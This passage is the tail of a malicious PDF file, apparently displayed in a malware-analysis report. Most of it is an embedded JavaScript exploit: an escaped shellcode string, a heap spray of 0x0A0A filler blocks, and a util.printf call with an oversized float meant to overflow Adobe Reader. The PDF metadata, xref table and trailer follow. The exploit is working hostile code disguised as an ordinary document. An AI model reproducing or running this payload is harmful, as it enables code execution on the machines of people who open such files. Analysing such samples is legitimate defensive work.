                         "%uC399%u9449%uE58D%u5F1A%u52F6%uA049%u169B%u27C1" +
                         "%u100E%uD7E2%uE57E%uC08C%u83B6%u8394%uE5D4%uD7FD" +
                         "%uE57E%uBE30%u378B%u7231%u66F1%u8B9B%uA906%u91C6" +
                         "%u8767%u8B9B%uE5DB%u5F0F%u4AC3%u17C1%u8F54%u15C1" +
                         "%uA7B6%u5FA4%uE58D%uC884%uAD86%u3503%u6D87%u5F03" +
                         "%u6D85%u5F01%uE57F%u5735%u6043%u0449%u6AEF%u3C9B" +
                         "%u6ED5%uD4C2%uA806%u86CF%u91D3%u2895%uE5DF%uBE1A" +
                         "%u3784%uE92A%u6E85%u57C2%u7D43%u9294%u5005%uA142" +
                         "%uEE7F%u54F4%uEDDB%uF42E%uB20E%uF4A8%u91D6%u3895" +
                         "%u6A42%u88C1%u40E4%u13A7%u6DC1%uACC6%u6EE0%uE7C2" +
                         "%u3E45%u8792%u3ED3%u833D%uE579%u841E%u91D6%u2495" +
                         "%u91D5%u2095%uAEB6%u516E%u1B45%u853B%u38D7%u2B91" +
                         "%u3457%u7F9B%u8067%u14F1%u8646%u2BE4%u917A%uB185" +
                         "%u3EF1%uBBB0%u2FE6%uB0A6%u0BF7%uA7B1%u2985%uA0A7" +
                         "%u17D6%uA0B1%u03E0%uBD86%u0BF7%uA0A1%u1CEA%u95BB" +
                         "%u3985%uBAAB%u16C0%uB7A7%u2B85%uBDBA%u3AF1%uA6AA" +
                         "%u0FE0%uD4A6%u01C9%uB0A3%u07C9%uA6A0%u1CE4%u95BB" +
                         "%u1B85%uB8B0%u01E8%uD4AC%u3CD0%u908E%u19EA%uB8AC" +
                         "%u0FEA%u80A6%u28EA%uB8AB%u2FE0%u25C2%u8368%u772B" +
                         "%uD833%u3E32%u846C%u786B%u9432%u2034%u9133%u2132" +
                         "%uC479%u2875%u9264%u4DDB");
						 
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f 
0000000015 00000 n 
0000000264 00000 n 
0000000282 00000 n 
0000000327 00000 n 
0000000400 00000 n 
0000000431 00000 n 
0000000451 00000 n 
0000000490 00000 n 
0000000556 00000 n 
0000000734 00000 n 
0000000784 00000 n 
0000000865 00000 n 
0000000912 00000 n 
0000006893 00000 n 
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF

Open this report in the interactive analyzer, or submit your own file for analysis.